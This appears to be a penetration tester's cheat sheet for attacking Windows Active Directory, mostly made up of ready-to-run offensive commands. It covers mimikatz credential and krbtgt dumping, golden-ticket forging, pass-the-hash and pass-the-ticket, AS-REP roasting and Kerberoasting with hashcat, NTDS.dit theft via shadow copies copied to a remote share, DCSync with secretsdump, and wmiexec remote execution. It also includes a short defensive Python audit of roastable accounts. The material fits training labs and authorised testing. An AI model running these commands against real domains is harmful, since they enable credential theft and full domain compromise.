Active Directory

  • Active Directory Basics
  • Attacking Kerberos
  • Exploiting a Domain Controller
  • Post exploitation tasks

mimikatz http://woshub.com/how-to-get-plain-text-passwords-of-windows-users/

Bypassing UAC https://0x00-0x00.github.io/research/2018/10/31/How-to-bypass-UAC-in-newer-Windows-versions.html

Lateral movement https://www.hackingarticles.in/lateral-movement-over-pass-the-hash/

https://medium.com/r3d-buck3t/play-with-hashes-over-pass-the-hash-attack-2030b900562d

Dante https://karol-mazurek95.medium.com/dante-guide-htb-a7dfd0387a9c

AD enum https://notes.offsec-journey.com/privilege-escalation/domain-privilege-escalation#common-misconfigurations

https://github.com/jesusgavancho/TryHackMe_and_HackTheBox/blob/master/Windows%20Local%20Persistence.md

https://benheater.com/tryhackme-exploiting-active-directory/

https://trojand.com/cheatsheet/Windows/Initial_Foothold.html


GUI - Desktop


User password reset

Set-ADAccountPassword sophie -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose

Force a password reset at the next logon

Set-ADUser -ChangePasswordAtLogon $true -Identity sophie -Verbose

RDP


Remotely enable RDP using CrackMapExec

sudo crackmapexec smb 10.69.88.23 -u user -p password -M rdp -o ACTION=enable

RDP through Pass-the-Hash

xfreerdp /u:USER /d:DOMAIN /pth:NTLM /v:server.domain.local

RDP using mimikatz and PtH

sekurlsa::pth /user:user /domain:domain.local /ntlm:xxxxxxxxxxxxxxx /run:"mstsc.exe /restrictedadmin"

Mimikatz


Full dump

mimikatz.exe "token::elevate" "privilege::debug" "lsadump::lsa" "lsadump::sam" "lsadump::secrets" "lsadump::cache" "sekurlsa::logonpasswords"

Run as administrator (ensure this outputs Privilege '20' OK)

privilege::debug

Dump hashes

lsadump::lsa /patch

List active user sessions

sekurlsa::logonPasswords full

Get user password hashes and export to a text file

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >> c:\tmp\mimikatz_output.txt

Golden Ticket

Dump the hash and security identifier of the Kerberos Ticket Granting Ticket (krbtgt) account; together they are what a golden ticket is forged from.

Dump the krbtgt hash (krbtgt is the KDC service account; its key encrypts every TGT issued in the domain)

lsadump::lsa /inject /name:krbtgt

Create a Golden Ticket (/sid takes the domain SID, S-1-5-21-..., as shown by lsadump, not a hash; /krbtgt takes the krbtgt NTLM hash dumped above; /id:500 is the built-in Administrator RID)

kerberos::golden /user:Administrator /domain:controller.local /sid:<domain SID> /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500

Open a new command prompt that carries the forged ticket; every machine in the domain will accept it

misc::cmd

Pass the Ticket w/ Mimikatz

With the ticket ready, pass it into the current session to obtain domain admin privileges.

kerberos::ptt <ticket.kirbi>

klist - verify the impersonation worked by listing the cached tickets.

LDAP


Get machine names

crackmapexec smb 192.168.98.100-102

Initial info gathering

python3 /opt/ldapsearch-ad/ldapsearch-ad.py -l 192.168.98.100 -t info

nmap -n -sV --script "ldap* and not brute" 172.31.3.2 -Pn

Get naming context

# The nmap ldap* scripts above also return this
ldapsearch -H ldap://10.10.10.100 -x -s base namingcontexts

python3 /opt/ldapsearch-ad/ldapsearch-ad.py -l 192.168.10.100 -t info

Retrieve users (some users might be missing, so it is worth doing an RPC request as well)

ldapsearch -x -H ldap://192.168.98.100 -D 'cyber.com' -w '' -b "DC=cyber,DC=com" > ldap_dc.txt
grep -i samaccountname ldap_dc.txt | sed -e 's/samaccountname: //gi'



ldapsearch -H ldap://10.10.10.100 -x -b "dc=cyber,dc=com"

# More precise: only request sAMAccountName from user objects
ldapsearch -H ldap://10.10.10.100 -x -b "dc=cyber,dc=com" '(objectClass=user)' sAMAccountName | grep sAMAccountName



Check ldap entries

nmap -p389 10.0.2.23 --script=ldap-search

ldapsearch -x -b "dc=cyber,dc=com" -H ldap://10.0.2.23

# On Windows, LDAP Admin can be used instead

Dump ldap data

ldapdomaindump -u dictionary.csl\\izabel -p "June2013" -o ldapdomaindump_artifacts 172.31.3.4

If the password attribute is not included in the search results and the directory is an OpenLDAP server we can SSH into, slapcat dumps the whole database, including the userPassword values (base64-encoded):

sudo slapcat

RPC


Retrieve user entries

rpcclient 10.10.10.100
rpcclient -U '' 10.10.10.100
rpcclient -U '' -N 10.10.10.100
# then, at the rpcclient prompt:
# enumdomusers
# enumdomgroups
# querydispinfo

crackmapexec smb megabank.local -u '' -p '' --users

Active Directory


Query the AD (with a domain user)

nmap -p389 10.0.2.23 --script=ldap-search --script-args="ldap.username=cybex\adam,ldap.password=Blue231,ldap.qfilter=users" -Pn


We can also use jxplorer

sudo apt install jxplorer

NTDS.dit & SYSTEM hive

Method 1

Make an accessible copy of the SYSTEM hive (it holds the boot key needed to decrypt the database)

reg save HKLM\SYSTEM C:\system.hive

Copy the DB and the hive to our Kali share (ntds.dit is locked while the NTDS service runs, so the copy must come from a shadow copy, as in Method 2)

copy ntds.dit \\IP\smb\ntds.dit
copy C:\system.hive \\IP\smb\system.hive

Let’s retrieve the hashes from it

secretsdump.py -ntds ntds.dit -system system.hive 

Method 2

Make an accessible copy of the Active Directory Database

reg save HKLM\SYSTEM C:\temp\sys

Use vssadmin to create a shadow copy and take ntds.dit from it (the live file is locked)

vssadmin create shadow /for=C:

Copy ntds.dit out of the shadow copy to C:\temp\

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit c:\temp\dit

Repair the copied database (a copy taken from a live volume may be in a dirty state)

ESENTUTL /p c:\temp\dit /!1024 /8 /o

On Windows, dump the hashes of all the users with DSInternals

powershell -ep bypass
Import-Module DSInternals
$key = Get-BootKey -SystemHiveFilePath c:\temp\sys
Get-ADDBAccount -All -BootKey $key -DBPath c:\temp\dit

More about VSS

The Volume Shadow Copy Service (VSS) takes read-only snapshots of entire volumes periodically. In the case of VSS, a volume refers to a drive letter, typically the C drive.

These snapshots are used as backup points in a similar way to the ‘restore’ points found in XP and earlier versions. However, unlike a standard versioning system, VSS does not allow shadow copies of individual files to be created; it deals only in full volumes. To save space a shadow copy stores only the blocks that changed since the snapshot, not a full copy of the file structure.

Standard users have no access to the VSS. Administrators have access to vssadmin, which can be used to create, list, and recover data from a shadow copy.

It is possible to list and recover individual files from the VSS, as per the three-step process below:

  1. vssadmin list shadows
  2. set VSHADOW_DEVICE=\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
  3. for /R %VSHADOW_DEVICE%\ %i in (*) do @echo %i (be aware that the output is verbose)

It’s also possible to copy specific files from the Volume Shadow Copy, directly to your own local system. An example of what that command would look like has been provided below:
copy %VSHADOW_DEVICE%\Users\Administrator\Desktop\secretfile.txt c:\Users\Administrator\Desktop

VSS is useful for recovering files that have been encrypted by ransomware, logs, and files that have been removed by an attacker, or even just for accidentally deleted files.

Please refer to the following MSDN article and vssadmin usage guide for more information on the subject.

DC / Kerberos

User enumeration

/opt/kerbrute userenum -d brute.csl --dc 172.31.3.3 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

# this flag set belongs to the Python kerbrute, not the Go version above
kerbrute -users /usr/share/seclists/Usernames/Names/names.txt -domain BRUTE -dc-ip brute.csl

GetNPUsers


GetNPUsers.py brute.csl/ -usersfile name.txt -format john -outputfile hash

python /opt/impacket/build/scripts-3.9/GetNPUsers.py brute.csl/ -usersfile users.txt -dc-ip 172.31.3.3 -outputfile hashes.asreproast

impacket-GetNPUsers -dc-ip $DC_IP -request 'htb.local/'
impacket-GetNPUsers -dc-ip $DC_IP active.htb/user -no-pass

sudo python2 GetNPUsers.py -request -format john -dc-ip 172.31.3.4 dictionary/izabel -no-pass

then crack with hashcat (mode 18200 = Kerberos 5 AS-REP, etype 23)

hashcat -m 18200 hash.txt rockyou.txt

If GetNPUsers returns nothing (no account has pre-authentication disabled) but we hold write permissions over another user's account, we can disable pre-authentication on that account ourselves, which makes it AS-REP roastable. This flips the DONT_REQ_PREAUTH bit in userAccountControl, a change defenders can watch for.

Set-ADAccountControl -Identity user2 -DoesNotRequirePreAuth $true
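As an added defensive check (not code from the page or from any tool it lists): a small Python audit that parses ldapsearch LDIF output like the dumps in the LDAP section and flags the two account states this page goes after, DONT_REQ_PREAUTH (the bit Set-ADAccountControl -DoesNotRequirePreAuth flips, exposing the account to AS-REP roasting) and accounts carrying an SPN (Kerberoastable). The LDIF is constructed; the userAccountControl bit values are Microsoft's documented constants.

```python
import base64

UAC_ACCOUNTDISABLE = 0x0002       # userAccountControl bits, Microsoft-documented values
UAC_DONT_REQ_PREAUTH = 0x400000   # "Do not require Kerberos preauthentication"

# Constructed sample shaped like `ldapsearch -x -b "dc=cyber,dc=com"` output ("::" marks base64)
SAMPLE_LDIF = """\
dn: CN=svc sql,CN=Users,DC=cyber,DC=com
sAMAccountName: svc_sql
servicePrincipalName: MSSQLSvc/sql01.cyber.com:1433
userAccountControl: 66048

dn: CN=user2,CN=Users,DC=cyber,DC=com
sAMAccountName: user2
userAccountControl: 4194816

dn: CN=old user,CN=Users,DC=cyber,DC=com
sAMAccountName:: b2xkLnVzZXI=
userAccountControl: 4194818
"""

def parse_ldif(text):
    """Split LDIF into {attribute: [values]} dicts (unfolds continuation lines, decodes '::' base64)."""
    entries, current = [], {}
    for line in (text.replace("\n ", "") + "\n\n").splitlines():   # trailing blank closes last entry
        if not line.strip():
            if current:
                entries.append(current)
            current = {}
        elif not line.startswith("#"):          # ldapsearch comment lines carry no data
            key, _, value = line.partition(": ")
            if key.endswith(":"):               # "attr:: <base64>"
                key, value = key[:-1], base64.b64decode(value).decode()
            current.setdefault(key, []).append(value.strip())
    return entries

def audit(entries):
    """Return {sAMAccountName: [findings]} for accounts exposed to AS-REP roasting or Kerberoasting."""
    findings = {}
    for e in entries:
        uac = int(e.get("userAccountControl", ["0"])[0])
        notes = []
        if uac & UAC_DONT_REQ_PREAUTH:
            notes.append("DONT_REQ_PREAUTH set (AS-REP roastable)")
        if "servicePrincipalName" in e:
            notes.append("has SPN (Kerberoastable)")
        if notes and uac & UAC_ACCOUNTDISABLE:
            notes.append("account disabled")   # still worth cleaning up, but not usable as-is
        if notes:
            findings[e.get("sAMAccountName", ["?"])[0]] = notes
    return findings
```

Run it against a real ldapsearch dump by reading the file into parse_ldif; accounts flagged here are the ones that should have pre-authentication re-enabled or a long random service password.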

Retrieve AD users

/opt/impacket/examples/GetADUsers.py -all cyber.com/ketty.ayan:thePass! -dc-ip 192.168.98.100

Kerberoasting with GetUserSPNs

impacket-GetUserSPNs -request -dc-ip $DC_IP active.htb/SVC_TGS:password
# might need to adjust the clock on the VM first (Kerberos rejects large time skew)
# sudo ntpdate $DC_IP

then crack with hashcat (mode 13100 = Kerberos 5 TGS-REP, etype 23)

hashcat -m 13100 hash.txt rockyou.txt

Secretsdump

Retrieve all of the password hashes (the credentials and DC host were lost in extraction; placeholders below)

impacket-secretsdump -just-dc backup:<password>@<DC host>

Tools


Start

# start
powershell -ep bypass
Import-Module .\PowerView.ps1

PowerView

Basics

Get info on the machines (part of the domain)

Get-NetComputer
Get-NetComputer -FullData
Get-NetComputer | select operatingsystem,dnshostname

DNS lookup (find the IP of a machine)

Resolve-IPAddress CLIENT01

Show our Domain info

Get-NetDomain

Retrieve SID of the domain

Get-DomainSID

Retrieve the Domain controller info

Get-DomainController

About the Users / Groups

Get the users

# Long list
Get-NetUser

Get-NetUser -Username "name"

# Curated list
Get-NetUser | select samaccountname,lastlogon
Get-UserProperty -Properties lastlogon

The machines where the current user has admin rights

Find-LocalAdminAccess -Verbose

Find a specific string in a user attribute

Find-UserField -SearchField Description -SearchTerm "built"

Get the groups (domain)

Get-NetGroup
Get-NetGroup -Domain htb.local

Get-NetGroup | select samaccountname

Get-NetGroup *admin*

Get-NetGroup "Sales department" | select member
Get-NetGroupMember -GroupName "Domain Admins"

Who is in what groups (domain groups)

Get-NetGroup | Get-NetGroupMember

https://powersploit.readthedocs.io/en/latest/Recon/Get-NetLocalGroupMember/

Enumerate members of a local group on a remote machine (without admin privileges)

Get-NetLocalGroupMember -ComputerName client01 -GroupName mygroup [-Credential <PSCredential>]

Get-NetLocalGroup -ComputerName client01 [-API]

User hunting: Searching in logged on accounts

# This combines several of the commands below
Invoke-UserHunter

# Show who has a session on Client01
Get-NetSession -ComputerName Client01 -Verbose

# Who's logged on
Get-LastLoggedOn
Get-NetLoggedOn -ComputerName Client01
Get-NetLoggedOnLocal

# can also use sysinternal tools
.\PsLoggedon.exe \\client01

Search for Domain Admin sessions

# noisy: touches every host in the domain
Find-LocalAdminAccess

Stealth option: restrict the hunt to commonly trafficked servers (file servers, DCs) and query only those instead of every host.

Shares

Find shares

Invoke-ShareFinder

Find sensitive files in the domain

Invoke-FileFinder

Find all the file servers in the domain

Get-NetFileServer

Object Permissions, Group permissions (GPO)

  • GenericAll: full permissions on the object
  • GenericWrite: edit certain attributes of the object
  • WriteOwner: change ownership of the object
  • WriteDACL: edit the object's permissions
  • AllExtendedRights: change password, reset password, etc.
  • ForceChangePassword: change the password of the object
  • Self: self membership (add oneself to the group)

Get the GPO

Get-NetGPO

List any admins

Find-GPOComputerAdmin -ComputerName dc01.htb.local

List anyone who can administer any machine (through GPO)

Find-GPOLocation

Organization Unit (OU)

Get-NetOU -FullData

List interesting ACLs

Invoke-ACLScanner -ResolveGUIDs

Show the ACLs set on a user object

Get-ObjectAcl -SamAccountName "user1" -ResolveGUIDs

Show anyone with GenericAll on the "Management department" group

Get-ObjectAcl -Identity "Management department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"}

# Shorter output
Get-ObjectAcl -Identity "Management department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights

# Same check against a user object
Get-ObjectAcl -Identity "jen" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights

Translate SecIdentifier to a name

"SIDXXX","OTHER-SID" | Convert-SidToName

Change password of user on domain

net user jen Password123 /domain

Impersonate: launch a command prompt as jen

# Runas 
runas /user:corp\jen powershell.exe

Bloodhound


Start

# start
powershell -ep bypass
Import-Module .\SharpHound.ps1

Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Temp -OutputPrefix "corp_audit"

Impacket


https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/

https://neil-fox.github.io/Impacket-usage-&-detection/

lookupsid.py is a tool for brute forcing Windows SIDs; it attempts to identify remote users and groups.

Enumerate the domain with lookupsid.py

for user in $(cat users.txt); do lookupsid.py svccorp.com/$user:'Password123'@172.31.2.1; done

Secretsdump is a script used to extract credentials and secrets from a system. Its main use-cases are:

  • Dump the NTLM hashes of local users (remote SAM dump)
  • Extract domain credentials via DCSync

secretsdump.py svcorp/Administrator:mypass@IP
secretsdump.py -no-pass -just-dc svcorp/user1@IP

wmiexec.py is another script part of the Impacket framework. It is used to silently execute commands against a compromised endpoint using WMI.

python3 /opt/impacket/examples/wmiexec.py -hashes ':533f1bd576caa912bdb9da284bbc60fe' 'za.tryhackme.com/<user>@<host>'

python3 /opt/impacket/examples/wmiexec.py 'za.tryhackme.com/administrator:<password>@<host>'